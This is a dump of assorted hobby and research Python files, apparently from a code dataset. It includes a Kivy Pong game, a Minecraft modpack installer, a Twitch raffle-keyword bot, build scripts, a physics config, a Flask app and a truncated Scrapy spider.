ReferenceListProperty, Clock, \\\n ObjectProperty\nfrom kivy.uix.widget import Widget\nfrom kivy.vector import Vector\n\nkivy.require('1.10.0')\n\n\nclass PongBall(Widget):\n velocity_x = NumericProperty(0)\n velocity_y = NumericProperty(0)\n velocity = ReferenceListProperty(velocity_x, velocity_y)\n\n def move(self):\n self.pos = Vector(*self.velocity) + self.pos\n\n\nclass PongGame(Widget):\n ball = ObjectProperty()\n player1 = ObjectProperty()\n player2 = ObjectProperty()\n\n def serve_ball(self, speed=4, min_angle=0, max_angle=360):\n self.ball.center = self.center\n new_velocity = Vector(speed, 0).rotate(randint(min_angle, max_angle))\n self.ball.velocity = new_velocity\n\n def update(self, dt):\n self.ball.move()\n\n self.player1.bounce_ball(self.ball)\n self.player2.bounce_ball(self.ball)\n\n if (self.ball.y < 0) or (self.ball.top > self.height):\n self.ball.velocity_y *= -1\n\n if self.ball.x < 0:\n self.player2.score += 1\n self.serve_ball(min_angle=-90, max_angle=90)\n if self.ball.x > self.width:\n self.player1.score += 1\n self.serve_ball(min_angle=90, max_angle=270)\n\n def on_touch_move(self, touch):\n if touch.x < self.width / 3:\n self.player1.center_y = touch.y\n if touch.x > self.width - self.width / 3:\n self.player2.center_y = touch.y\n\n\nclass PongPaddle(Widget):\n score = NumericProperty(0)\n\n def bounce_ball(self, ball):\n if self.collide_widget(ball):\n vx, vy = ball.velocity\n offset = (ball.center_y - self.center_y) / (self.height / 2)\n bounced = Vector(-1 * vx, vy)\n vel = bounced * 1.1\n ball.velocity = vel.x, vel.y + offset\n\n\nclass PongApp(App):\n def build(self):\n Logger.info('Pong: Building PongApp')\n game = PongGame()\n game.serve_ball()\n Clock.schedule_interval(game.update, 1.0/60.0)\n return game\n\n\nif __name__ == '__main__':\n Logger.info('Pong: Running PongApp')\n PongApp().run()\n","sub_path":"poc/pong/pong.py","file_name":"pong.py","file_ext":"py","file_size_in_byte":2284,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"589646182","text":"##############\n# Exercise 2.6\n##############\nfrom collections import Counter\nclass AADist:\n \"\"\"\n The class provides a method to read fasta files and to calculate certain statistics on the read sequences.\n \"\"\"\n\n def __init__(self, filepath):\n self.__sequences = {}\n self.read_fasta(filepath)\n\n\n def get_counts(self):\n return len(self.__sequences.keys())\n\n\n def get_average_length(self):\n cnt = 0\n for i,j in self.__sequences.items():\n cnt = cnt+len(j)\n res=cnt/len(self.__sequences.keys())\n return res\n\n\n def read_fasta(self, path):\n def reader(fp):\n head= None\n seq=[]\n for line in fp:\n line=line.rstrip()\n if(line.startswith('>')):\n if(head):\n yield(head, ''.join(seq))\n head=line\n seq=[]\n else:\n seq.append(line)\n if head:\n yield(head,\"\".join(seq))\n\n with open(path) as filee:\n for i,j in reader(filee):\n if j[-1]==\"*\":\n j=j[:-1]\n self.__sequences[i]=j\n\n\n\n def get_abs_frequencies(self):\n # return number of occurences not normalized by length\n resf={}\n for i,j in self.__sequences.items():\n number_counted=Counter(j)\n for k in number_counted:\n if(not k in resf):\n resf[k]=number_counted[k]\n else:\n resf[k]=resf[k]+number_counted[k]\n\n return resf\n\n\n def get_av_frequencies(self):\n # return number of occurences normalized by length\n resf = {}\n for i,j in self.__sequences.items():\n number_counted=Counter(j)\n for k in number_counted:\n if(not k in resf):\n resf[k]=number_counted[k]\n else:\n resf[k]=resf[k]+number_counted[k]\n\n cnt=sum(resf.values())\n resf_dict={}\n for i in resf:\n resf_dict[i]=resf[i]/cnt\n return resf_dict\n","sub_path":"codechecker/repos/1/collected_files/aa_dist/ge73fog.py","file_name":"ge73fog.py","file_ext":"py","file_size_in_byte":2156,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"453882854","text":"#! python3\r\n\r\n#Gets a street address from the command line arguments or from clipboard.\r\n#Opens the web browser to the Google Maps page for the address.\r\n# How to run:\r\n# Copy address -> Win + R -> mapit (+ paste)\r\n\r\nimport webbrowser, sys, pyperclip\r\n\r\nif len(sys.argv) > 1:\r\n # Get the address from cmd line:\r\n address = ' '.join(sys.argv[1:])\r\nelse:\r\n # Get the address from clipboard\r\n address = pyperclip.paste()\r\n\r\n#open a web browser to:\r\nwebbrowser.open('https://www.google.com/maps/place/' + address)\r\n","sub_path":"mapit.py","file_name":"mapit.py","file_ext":"py","file_size_in_byte":523,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"421194512","text":"import json\nimport os\nimport shutil\nimport sys,collections\nimport zipfile,getpass\nimport webbrowser\nimport urllib.request\nimport urllib.error\nimport urllib.parse\nfrom pathlib import Path\n\nclass modc:\n url = 'http://modc.wwsg18.com/'\n title = 'minecraft'\n author = 'modc'\n about = 'a minecraft game'\n version = '1.7.10'\n starter = 'HMCL-Win'\n mod = []\n map = []\n texture = []\n curdir = False\n\n def downGame(self):\n path = os.path.join(os.getcwd(),self.version + '.zip')\n download = 'https://wwsg18.cdn.bcebos.com/modc/game/' + self.version + '.zip'\n\n if not self.curdir:\n if os.path.exists(self.version):\n shutil.rmtree(self.version)\n\n if os.path.exists(self.title):\n shutil.rmtree(self.title)\n else:\n rootdir = os.getcwd()\n filelist=os.listdir(rootdir) \n for f in filelist:\n filepath = os.path.join( rootdir, f )\n if os.path.basename(filepath) != \"modc.json\":\n if os.path.isfile(filepath):\n os.remove(filepath)\n elif os.path.isdir(filepath):\n shutil.rmtree(filepath,True)\n\n status = self.download(download,path,'Game',self.version)\n\n if not status:\n print('游戏本体下载失败,程序自动退出....')\n exit()\n\n f = zipfile.ZipFile(self.version + '.zip')\n if self.curdir:\n zpath = ''\n else:\n zpath = self.title\n for file in f.namelist():\n extracted_path = Path(f.extract(file,zpath))\n try:\n extracted_path.rename(os.path.join(os.path.dirname(path),zpath,file).encode('cp437').decode('gbk'))\n except:\n extracted_path.rename(os.path.join(os.path.dirname(path),zpath,file).encode('cp437').decode('utf-8'))\n\n f.close()\n\n os.remove(self.version + '.zip')\n \n def downStarter(self):\n \n if self.curdir:\n path = os.path.join(os.getcwd(),self.starter + '.zip')\n else:\n path = os.path.join(os.getcwd(),self.title,self.starter + '.zip')\n\n download = 'http://wwsg18.cdn.bcebos.com/modc/starter/' + self.starter +'.zip'\n\n status = self.download(download,path,'Starter',self.starter)\n\n if not status:\n return\n\n f = zipfile.ZipFile(path)\n for file in f.namelist():\n if self.curdir:\n extracted_path = Path(f.extract(file,''))\n else:\n extracted_path = Path(f.extract(file,os.path.dirname(path)))\n \n try:\n extracted_path.rename(os.path.join(os.path.dirname(path),file).encode('cp437').decode('gbk'))\n except:\n extracted_path.rename(os.path.join(os.path.dirname(path),file).encode('cp437').decode('utf-8'))\n\n f.close()\n os.remove(path)\n\n def downPkg(self):\n if self.mod:\n for mod in self.mod.keys():\n download = 'http://wwsg18.cdn.bcebos.com/modc/package/mod/' + self.version + '/' + mod + '.jar'\n if self.curdir:\n path = os.path.join(os.getcwd(),'.minecraft/mods',mod + '.jar')\n else:\n path = os.path.join(os.getcwd(),self.title,'.minecraft/mods',mod + '.jar')\n try:\n urllib.request.urlopen(self.url + \"request/download?name=\" + mod + '&game=' + self.version)\n except urllib.error.HTTPError:\n pass\n\n status = self.download(download,path,'Mod',mod)\n\n if not status:\n continue\n\n if self.map:\n for map in self.map.keys():\n download = 'http://wwsg18.cdn.bcebos.com/modc/package/map/' + self.version + '/' + map + '.zip'\n\n if self.curdir:\n path = os.path.join(os.getcwd(),'.minecraft/saves',map + '.zip')\n else:\n path = os.path.join(os.getcwd(),self.title,'.minecraft/saves',map + '.zip')\n\n try:\n urllib.request.urlopen(self.url + \"request/download?name=\" + map)\n except urllib.error.HTTPError:\n pass\n\n status = self.download(download,path,'Map',map)\n\n if not status:\n continue\n\n f = zipfile.ZipFile(path)\n for file in f.namelist():\n f.extract(file, os.path.dirname(path))\n f.close()\n os.remove(path)\n\n if self.texture:\n for texture in self.texture.keys():\n download = 'http://wwsg18.cdn.bcebos.com/modc/package/texture/' + self.version + '/' + texture + '.zip'\n \n if self.curdir:\n path = os.path.join(os.getcwd(),'.minecraft/resourcepacks',texture + '.zip')\n else:\n path = os.path.join(os.getcwd(),self.title,'.minecraft/resourcepacks',texture + '.zip')\n\n try:\n urllib.request.urlopen(self.url + \"request/download?name=\" + texture)\n except urllib.error.HTTPError:\n pass\n\n status = self.download(download,path,'Texture',texture)\n\n if not status:\n continue\n\n\n def download(self,url,path,type,val):\n print('开始下载: ' + type + '[' + val + \"]: \")\n try:\n urllib.request.urlretrieve(url, path, self.Schedule)\n except urllib.error.HTTPError:\n print(type + '[' + val + ']资源不存在...\\n')\n return False\n else:\n print('\\n')\n return True\n \n\n def Schedule(self,a,b,c):\n per = int(100.0 * a * b / c)\n if per > 100:\n per = 100\n self.viewBar(per,100)\n\n def viewBar(self,num, total):\n rate = num / total\n rate_num = int(rate * 100)\n r = '\\r[%s%s]' % (\">\" * num, \" \" * (100 - num))\n sys.stdout.write(r)\n sys.stdout.write(str(num) + '%')\n sys.stdout.flush()\n\ndef main():\n args = sys.argv\n if len(args) == 1:\n print('''\nUsage:\n modc <指令> [参数]\n \nCommands:\n init 初始化modc配置文件\n search 在modc搜索一个资源\n home 打开一个资源的主页\n install 安装一个游戏包\n add 增加资源到配置\n remove 删除资源从配置\n preload 自动加载前置模组\n download 下载一个现成的整合包\n recomm 随机推荐资源\n info 获取Modc信息\n ''')\n elif len(args) == 2 and args[1] == 'init':\n config_name_default = \"Minecraft\"\n config_author_default = getpass.getuser()\n config_about_default = \"这是一个我的世界整合包\"\n config_version_default = \"1.7.10\"\n config_starter_default = \"HMCL-Win\"\n config_curdir_default = False\n config_mods = {}\n config_maps = {}\n config_textures = {}\n\n print(\"所有选项的详情可以前往:http://bbs.wwsg18.com 查看:\")\n config_name = input(\"请输入游戏包名(整合包文件名) [默认: \" + config_name_default + \"]:\")\n config_author = input(\"请输入游戏包创建者(整合包创建者) [默认: \" + config_author_default + \"]:\")\n config_about = input(\"请输入游戏包介绍(简单的介绍整合包) [默认: \" + config_about_default + \"]:\")\n config_version = input(\"请输入游戏版本(支持版本请前往官网查看) [默认: \" + config_version_default + \"]:\")\n config_starter = input(\"请输入使用启动器(推荐HMCL,MultiMc) [默认: \" + config_starter_default + \"]:\")\n config_curdir = input(\"是否直接在当前目录下创建程序(输入True或False) [默认: False]:\")\n config_mod = input(\"设置要安装的mod(使用,分开) [默认: 空]:\")\n config_map = input(\"设置要安装的地图(使用,分开) [默认: 空]:\")\n config_texture = input(\"设置要安装的材质包(使用,分开) [默认: 空]:\")\n\n if config_name == \"\":\n config_name = config_name_default\n if config_author == \"\":\n config_author = config_author_default\n if config_about == \"\":\n config_about = config_about_default\n if config_version == \"\":\n config_version = config_version_default\n if config_starter == \"\":\n config_starter = config_starter_default\n if config_curdir != \"True\" and config_curdir != \"true\" and config_curdir != 'TRUE':\n config_curdir = config_curdir_default\n else:\n config_curdir = True\n if config_mod != \"\":\n config_mod_list = config_mod.split(',')\n for i in config_mod_list:\n config_mods[i] = \"*\"\n if config_map != \"\":\n config_map_list = config_mod.split(',')\n for i in config_map_list:\n config_maps[i] = \"*\"\n if config_texture != \"\":\n config_texture_list = config_mod.split(',')\n for i in config_texture_list:\n config_textures[i] = \"*\"\n\n file = open(os.path.join(os.getcwd(),'modc.json'),'w',encoding=\"utf-8\")\n config = collections.OrderedDict()\n \n config['title'] = config_name\n config['author'] = config_author\n config['about'] = config_about\n config['version'] = config_version\n config['starter'] = config_starter\n config['curdir'] = config_curdir\n config['mod'] = config_mods\n config['map'] = config_maps\n config['texture'] = config_textures\n\n\n\n file.write(json.dumps(config,sort_keys=False,indent=4,separators=(',', ':'),ensure_ascii=False))\n print(\"初始化完毕!请编辑 modc.json 来配置您的游戏....\")\n file.close()\n elif len(args) == 3 and args[1] == 'search':\n url = modc().url\n search = urllib.request.urlopen(url + 'api/search/package?service=search.package&word=' + urllib.parse.quote(args[2]))\n search = search.read().decode('utf8')\n data = json.loads(search)\n if data['code'] == 200:\n data = data['data']\n for package in data:\n msg = package['title'] + '/' + package['name'] + ': ' + package['about']\n print(msg)\n\n elif len(args) == 3 and args[1] == 'home':\n url = modc().url\n search = urllib.request.urlopen(url + 'api/search/package?service=search.package&word=' + urllib.parse.quote(args[2]))\n search = search.read().decode('utf8')\n data = json.loads(search)\n if data['code'] == 200:\n data = data['data']\n for package in data:\n msg = package['title'] + ':' + url + 'package/' + package['type'] + '/' + package['id']\n print(msg)\n\n elif len(args) == 4 and args[1] == 'add':\n file = open(os.path.join(os.getcwd(),'modc.json'),'r',encoding='UTF-8')\n config_old = file.read()\n file.close()\n config = collections.OrderedDict()\n config = json.loads(config_old,encoding='UTF-8')\n config[args[2]][args[3]] = '*'\n file = open(os.path.join(os.getcwd(),'modc.json'),'w',encoding='UTF-8')\n file.write(json.dumps(config,indent=4,separators=(',', ':'),ensure_ascii=False))\n file.close()\n print('增加 ' + args[2] + ': ' + args[3] + ' 成功!')\n elif len(args) == 4 and args[1] == 'remove':\n\n file = open(os.path.join(os.getcwd(), 'modc.json'), 'r',encoding='UTF-8')\n config_old = file.read()\n file.close()\n config = collections.OrderedDict()\n config = json.loads(config_old,encoding='UTF-8')\n if args[3] in config[args[2]]:\n config[args[2]].pop(args[3])\n file = open(os.path.join(os.getcwd(), 'modc.json'), 'w',encoding='UTF-8')\n file.write(json.dumps(config, indent=4, separators=(',', ':'),ensure_ascii=False))\n file.close()\n print('删除 ' + args[2] + ': ' + args[3] + ' 成功!')\n elif len(args) == 3 and args[1] == 'download':\n\n path = os.path.join(os.getcwd(),args[2] + '.zip')\n download = 'http://wwsg18.cdn.bcebos.com/modc/package/game/' + args[2] + '.zip'\n\n modc().download(download,path,'Integrated',args[2])\n\n f = zipfile.ZipFile(args[2] + '.zip')\n for file in f.namelist():\n f.extract(file,'')\n f.close()\n os.remove(args[2] + '.zip')\n\n print(\"游戏整合包: [\" + args[2] + \"] 下载成功!\")\n\n elif len(args) == 2 and args[1] == 'recomm':\n\n url = modc().url\n search = urllib.request.urlopen(url + 'api/recomm?service=recomm')\n search = search.read().decode('utf8')\n data = json.loads(search)\n if data['code'] == 200:\n data = data['data']\n for package in data:\n about = package['about']\n if len(about) > 42:\n about = about[0:42] + '...'\n msg = package['title'] + '/' + package['title'] + ' ' + about\n print(msg)\n elif len(args) == 2 and args[1] == 'preload':\n path = os.getcwd()\n \n if os.path.isfile(path + '/modc.json'):\n file = open(path + '/modc.json', 'r',encoding='UTF-8')\n config = file.read().encode(\"utf-8\")\n file.close()\n # json解析\n data_old = json.loads(config)\n data = json.loads(config)\n\n for mod in data_old['mod']:\n print(\"开始加载[\" + mod + \"]前置Mod....\")\n res = urllib.request.urlopen(\"http://api.wwsg18.com/public/?service=Modc.Data.GetData&Name=\" + mod)\n result = json.loads(res.read().decode('UTF-8'))\n\n if not 'Preposition' in result['data']:\n print('[' + mod + ']参数不存在....')\n continue\n\n pre = result['data']['Preposition']\n if pre == None:\n print('[' + mod + ']资源不存在....')\n continue\n\n if pre != \"\" and not pre.isspace():\n prelist = pre.split(',')\n for preo in prelist:\n data['mod'][preo] = '*'\n print(\"[\" + mod + \"]的前置mod: \" + preo + \" 加载成功!\")\n file = open(os.path.join(path,'modc.json'),'w',encoding='UTF-8')\n file.write(json.dumps(data,indent=4,separators=(',', ':'),ensure_ascii=False))\n file.close()\n else:\n print(\"[\" + mod + \"]无需加载任何前置....\")\n\n\n elif len(args) == 2 and args[1] == 'install':\n path = os.getcwd()\n\n if os.path.isfile(path + '/modc.json'):\n file = open(path + '/modc.json', 'r',encoding='UTF-8')\n config = file.read().encode(\"utf-8\")\n file.close()\n\n # json解析\n data = json.loads(config)\n\n # 处理json文件中的配置\n game = modc()\n if 'title' in data:\n game.title = data['title']\n if 'author' in data:\n game.author = data['author']\n if 'about' in data:\n game.about = data['about']\n if 'version' in data:\n game.version = data['version']\n if 'starter' in data:\n game.starter = data['starter']\n if 'curdir' in data:\n game.curdir = data['curdir']\n if 'mod' in data:\n game.mod = data['mod']\n if 'map' in data:\n game.map = data['map']\n if 'texture' in data:\n game.texture = data['texture']\n\n # 开始进行下载\n game.downGame()\n game.downStarter()\n game.downPkg()\n \n if not data['curdir']:\n shutil.copyfile('modc.json',os.path.join(os.getcwd(),data['title'],'modc.json'))\n\n print(\"游戏包已安装成功....\")\n elif len(args) == 2 and args[1] == 'info':\n info = \"\"\"\n--------------------- Modc Game Creater ---------------------\n软件名:Modc\n软件版本:Beta\n软件作者:mr小卓X(mrxzx@wwsg18.top)\n软件介绍:一款简单的整合包制作工具:可一键生成想要的整合包!\n编译信息:Python(Pyinstaller)\n官方网站:http://modc.wwsg18.com\n--------------------- Modc Game Creater ---------------------\n\"\"\"\n \n print(info)\n\n\nif __name__ == '__main__':\n main()","sub_path":"modc.py","file_name":"modc.py","file_ext":"py","file_size_in_byte":16758,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"556425914","text":"#!/usr/bin/python3\n\nimport sys\nimport traceback\nimport socket\nimport string\nimport gi\nfrom time import sleep\n\ngi.require_version('Notify', '0.7')\nfrom gi.repository import Notify\n\ndef subtract_lists(a, b):\n \"\"\" Subtracts two lists. Throws ValueError if b contains items not in a \"\"\"\n # Terminate if b is empty, otherwise remove b[0] from a and recurse\n return a if len(b) == 0 else [a[:i] + subtract_lists(a[i+1:], b[1:]) \n for i in [a.index(b[0])]][0]\n\nclass twitch_irc:\n _connected = False\n _logged = False \n\n def __init__(self, key: string, percent=80): \n Notify.init('Twitch')\n self._socket = None\n self._authkey = key\n self._username = ''\n self._channel = ''\n self._messages = []\n self._percent = percent\n self._lastkey = ''\n self._notify = Notify.Notification.new(self._username, 'Initialized', 'information')\n if not key.startswith('oauth:'):\n self._authkey = 'oauth:' + self._authkey\n\n def __del__(self):\n self.logout()\n\n def start(self):\n while 1:\n try:\n data = self._socket.recv(1024).decode().split(' ')\n except UnicodeDecodeError:\n continue\n\n if len(data) == 0:\n continue\n\n if data[0] == 'PING':\n self._socket.sendall(bytes('PONG :tmi.twitch.tv\\r\\n', 'UTF-8'))\n continue\n\n if len(data) < 2:\n continue\n\n if data[1] == 'PRIVMSG':\n currentmessage = ' '.join(data[3:]).replace(':', '').replace('\\r\\n', '')\n \n if self._lastkey == currentmessage:\n continue\n\n self._messages.append(currentmessage)\n\n orig_length = len(self._messages)\n msg_set = set(self._messages)\n if len(msg_set) == 0:\n continue\n\n percent = abs(((len(msg_set) - orig_length) / orig_length) * 100)\n if percent > self._percent:\n try:\n diff_list = subtract_lists(self._messages, list(msg_set))\n except ValueError:\n continue\n\n self._lastkey = diff_list[int(len(diff_list) / 2)]\n\n self._notify.update('%s Raffle! - %s' % (self._channel, self._username),\n 'Current keyword: %s' % self._lastkey)\n self._notify.show()\n print('Key: %s'% self._lastkey)\n self.send_message(self._lastkey)\n del self._messages[:]\n continue \n\n if len(self._messages) == 100:\n del self._messages[:]\n \n raise Exception('Disconnected!')\n\n def login(self, login):\n self.logout()\n self._socket = socket.socket()\n self._socket.settimeout(30) \n self._socket.connect(('irc.chat.twitch.tv', 6667))\n self._connected = True\n self._socket.sendall(bytes('PASS %s\\r\\n' % self._authkey, 'UTF-8'))\n self._socket.sendall(bytes('NICK %s\\r\\n' % login.lower(), 'UTF-8'))\n self._socket.sendall(bytes('USER %s\\r\\n' % login.lower(), 'UTF-8'))\n self._logged = True\n self._username = login\n print('Connected!')\n\n def logout(self):\n if self.is_connected() or self.is_logged():\n self._socket.close()\n del self._socket\n self._connected = False\n self._logged = False\n\n def is_connected(self):\n return self._connected\n\n def is_logged(self):\n return self._logged\n\n def send_message(self, message):\n self._socket.send(bytes('PRIVMSG #%s :%s\\r\\n' % (self._channel, message), 'UTF-8'))\n\n def set_channel(self, channel_name, message=''):\n if self.is_logged():\n self._channel = channel_name.lower()\n self._socket.sendall(bytes('JOIN #%s\\r\\n' % self._channel, 'UTF-8'))\n if len(message) > 0:\n self.send_message(message)\n\n\ndef main(argv):\n if len(argv) < 4:\n print('script.py [message]')\n print('Example 1: \"script.py oauth:sad4as4d564as65d6a MyName ChannelMLG\"')\n print('Example 2: \"script.py oauth:sad4as4d564as65d6a MyName ChannelMLG Hello\"')\n print('Example 3: \"script.py sad4as4d564as65d6a MyName ChannelMLG\"')\n print('Example 4: \"script.py sad4as4d564as65d6a MyName ChannelMLG Hello\"')\n sys.exit(0)\n\n print('Using OAuth: \"%s\"' % argv[1])\n print('Username: \"%s\"' % argv[2])\n print('Channel: \"%s\"' % argv[3])\n if len(argv) >= 5:\n print('Message: \"%s\"' % ' '.join(argv[4:]))\n\n irc = twitch_irc(argv[1])\n\n while True:\n try:\n irc.login(argv[2])\n irc.set_channel(argv[3], ' '.join(argv[4:]) if len(argv) == 5 else '')\n irc.start()\n except socket.timeout:\n print('No response in %is! Reconecting...' % irc._socket.gettimeout())\n sleep(10)\n except socket.gaierror:\n print('No internet! Check your connection.')\n sleep(20)\n except KeyboardInterrupt:\n sys.exit()\n except:\n print('Exception in user code:')\n print('-' * 60)\n traceback.print_exc(file=sys.stdout)\n print('-' * 60)\n\nif __name__ == '__main__':\n main(sys.argv)\n","sub_path":"start.py","file_name":"start.py","file_ext":"py","file_size_in_byte":5492,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"136223634","text":"import pathlib\n\nfrom pydo import *\n\nthis_dir = pathlib.Path(__file__).parent\n\npackage = {\n 'requires': ['net'],\n 'sysroot_debs': [],\n 'root_debs': ['wget', 'curl'],\n 'target': this_dir / 'balenamigration.tar.gz',\n 'install': ['{chroot} {stage} /bin/systemctl reenable balenamigration.service'],\n}\n\nstage = this_dir / 'stage'\nservice = this_dir / 'balenamigration.service'\nscriptmigration = this_dir / 'balenamigration.sh'\nscriptnettool = this_dir / 'nettool.sh'\n\n@command(produces=[package['target']], consumes=[service])\ndef build():\n call([\n f'rm -rf --one-file-system {stage}',\n\n f'mkdir -p {stage}/etc/systemd/system',\n f'mkdir -p {stage}/opt/balenamigration/',\n f'cp {service} {stage}/etc/systemd/system/',\n f'cp {scriptmigration} {stage}/opt/balenamigration/',\n f'cp {scriptnettool} {stage}/opt/balenamigration/',\n\n f'tar -C {stage} -czf {package[\"target\"]} .',\n ])\n\n\n@command()\ndef clean():\n call([\n f'rm -rf --one-file-system {stage} {package[\"target\"]}',\n ])\n","sub_path":"packages/balenamigration/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1051,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"240622846","text":"import FWCore.ParameterSet.Config as cms\nprocess = cms.Process(\"TEST\")\n\nprocess.maxEvents = cms.untracked.PSet( input = cms.untracked.int32(10) )\nprocess.source = cms.Source (\"PoolSource\",\n fileNames=cms.untracked.vstring(\n \"root://xrootd.unl.edu//store/mc/Summer12_DR53X/TToLeptons_t-channel_8TeV-powheg-tauola/AODSIM/PU_S10_START53_V7A-v1/0000/0034258A-D7DE-E111-BEE3-00261834B529.root\"\n )\n)\n\nprocess.genParticleSelector = cms.EDProducer('GenParticleSelector',\n src=cms.InputTag(\"genParticles\")\n)\nprocess.hasGenLepton = cms.EDFilter(\n \"PATCandViewCountFilter\",\n src=cms.InputTag(\"genParticleSelector\", \"trueLepton\"),\n minNumber=cms.uint32(1),\n maxNumber=cms.uint32(1),\n)\nprocess.multiCosTheta=cms.EDProducer(\"MultiCosThetaProducer\",\n lqTopCosTheta=cms.PSet(\n restFrame=cms.InputTag(\"genParticleSelector\",\"trueTop\"),\n particles=cms.VInputTag(cms.InputTag(\"genParticleSelector\",\"trueLepton\"),cms.InputTag(\"genParticleSelector\",\"trueLightJet\"))\n ),\n wHelicityCosTheta=cms.PSet(\n restFrame=cms.InputTag(\"genParticleSelector\",\"trueWboson\"),\n particles=cms.VInputTag(cms.InputTag(\"genParticleSelector\",\"trueLepton\"),cms.InputTag(\"genParticleSelector\",\"trueTop\"))\n )\n)\n\nprocess.p0 = cms.Path(process.genParticleSelector*process.hasGenLepton*process.multiCosTheta)\n\nprocess.out= cms.OutputModule(\"PoolOutputModule\",\n splitLevel=cms.untracked.int32(99),\n fileName=cms.untracked.string(\"test.root\"),\n SelectEvents=cms.untracked.PSet(\n SelectEvents=cms.vstring('p0')\n )\n)\n\nprocess.outpath = cms.EndPath(process.out)\n","sub_path":"CMSSW/src/SingleTopPolarization/MultiCosThetaProducer/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1594,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"92612819","text":"#-*- coding: utf-8 -*-\r\nimport RPi.GPIO as GPIO\r\nimport time # sleep 용도\r\n\r\nclass myLight:\r\n #7번 핀 사용\r\n def __init__(self, pin):\r\n self.light_pin = pin\r\n GPIO.setwarnings(False)\r\n GPIO.setmode(GPIO.BOARD)\r\n\r\n\r\n def rc_time(self):\r\n count = 0\r\n\r\n # Output on the pin for\r\n GPIO.setup(self.light_pin, GPIO.OUT) # 7번 핀을 입력으로 설정\r\n GPIO.output(self.light_pin, GPIO.LOW) # 7번 핀의 디지털 출력 설정\r\n # 셋중에 아무거나 골라서 사용\r\n # 1, GPIO.HIGH, True\r\n # 0, GPIO.LOW, False\r\n\r\n time.sleep(0.1) # 0.1 sec sleep\r\n\r\n # 7번 핀을 input으로 변경\r\n GPIO.setup(self.light_pin, GPIO.IN)\r\n\r\n # 7번 핀으로부터 읽은 값이 HIGH가 될 때까지 count 수행\r\n # 그래서 실행해보면 센서 주변이 어두울 수록 카운트 값이 크다.\r\n while (GPIO.input(self.light_pin) == GPIO.LOW):\r\n count += 1\r\n\r\n return count\r\n\r\n def CleanLight(self):\r\n GPIO.cleanup() # 사용했던 모든 포트에 대해서 정리\r\n\r\n","sub_path":"light_sensor.py","file_name":"light_sensor.py","file_ext":"py","file_size_in_byte":1130,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"616833325","text":"# -*- coding: utf-8 -*-\n\nimport time\nimport logging\nimport os\n\nclass Logger(object):\n def __init__(self, logger):\n \n self.logger = logging.Logger(logger)\n self.logger.setLevel(logging.DEBUG)\n \n steamtime = time.strftime('#Y-#m-#d-#H-#M-#S', time.localtime())\n dir_name = os.path.dirname(os.path.abspath('.')) + '\\\\logs\\\\'\n filename = dir_name + steamtime + '.log'\n rh = logging.FileHandler(filename)\n rh.setLevel(logging.INFO)\n \n sh = logging.StreamHandler()\n sh.setLevel(logging.INFO)\n\n fmt = logging.Formatter('%(asctime)s %(filename)s[%(lineno)d] %(name)s %(level)s %(message)s')\n rh.setFormatter(fmt)\n sh.setFormatter(fmt)\n \n self.logger.addHandler(rh)\n self.logger.addHandler(sh)\n \n def getlog(self):\n \n return self.logger","sub_path":"interface/src/common_/logger.py","file_name":"logger.py","file_ext":"py","file_size_in_byte":880,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"31441026","text":"# -*- coding: utf-8 -*-\n\nfrom flask import Flask, render_template, request\nimport os\n\n\ndef create_app(testing = False):\n\n \"\"\"app factory\"\"\"\n\n app = Flask(__name__)\n\n # app context manager\n app_ctx = app.app_context()\n app_ctx.push()\n\n app.config[\"SECRET_KEY\"] = \"Your-secret-key-here\"\n\n\n CWD = os.getcwd()\n\n BASIC_AUTH_SQLITE_DATABSE_URI = os.path.join(CWD, 'blueprints/auth/basic_auth/sqlite_db.db')\n app.config['BASIC_AUTH_SQLITE_DATABSE_URI'] = BASIC_AUTH_SQLITE_DATABSE_URI\n\n # debug mode on while testing the app or when in development mode\n if testing:\n app.debug = True\n\n\n # flask app routes\n \n @app.route(\"/\")\n # root route\n def index():\n \"\"\"Landing page of the app\"\"\"\n return render_template(\"index.html\")\n\n\n @app.route(\"/about\")\n # about page\n def about():\n \"\"\"about page of the app\"\"\"\n return render_template(\"about.html\")\n\n \n @app.route('/sitemap')\n # sitemap\n def routes():\n \"\"\"displays all the routes for the app\"\"\"\n routes = {}\n for rule in app.url_map.iter_rules():\n if rule.endpoint != \"static\":\n routes[rule.rule] = app.view_functions[rule.endpoint].__doc__\n endpoints = list(routes.keys())\n endpoints.sort()\n return render_template('routes.html', routes = routes, endpoints = endpoints)\n\n\n # registering blueprints\n\n #components blueprint\n from blueprints.components import componentsBP\n app.register_blueprint(componentsBP.bp)\n\n # authentication blueprint\n from blueprints.auth import authBP\n app.register_blueprint(authBP.bp)\n\n from blueprints.auth.basic_auth import sqlite_db\n sqlite_db.init_app(app)\n sqlite_db.init_db()\n \n\n return app\n\n\nif __name__ == \"__main__\":\n FLASK_APP = create_app(testing = True)\n FLASK_APP.run(port = 5000)","sub_path":"template/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1870,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"637513762","text":"# -*- coding: utf-8 -*-\nimport scrapy\nfrom parse_tools.parseTools import get_next_pages, get_urls, get_text, get_js_webpage\nfrom zhengce.items import failurl, zhengCe\nfrom datetime import datetime\n\nclass A44GuangdZcSpider(scrapy.Spider):\n name = '44_guangd_zc'\n allowed_domains = ['www.gd.gov.cn']\n start_urls = ['http://www.gd.gov.cn/zwgk/wjk/qbwj/index.html']\n\n def parse(self, response):\n \"\"\"\n 回调列表处理函数,处理起始页面的文章。获取总页数,拼接剩余页地址,回调列表处理函数处理剩余文章。\n :param response:\n :return:\n \"\"\"\n try:\n #处理首页\n yield response.follow(response.url, self.parse_list, meta={'a_websource': '广东'})\n 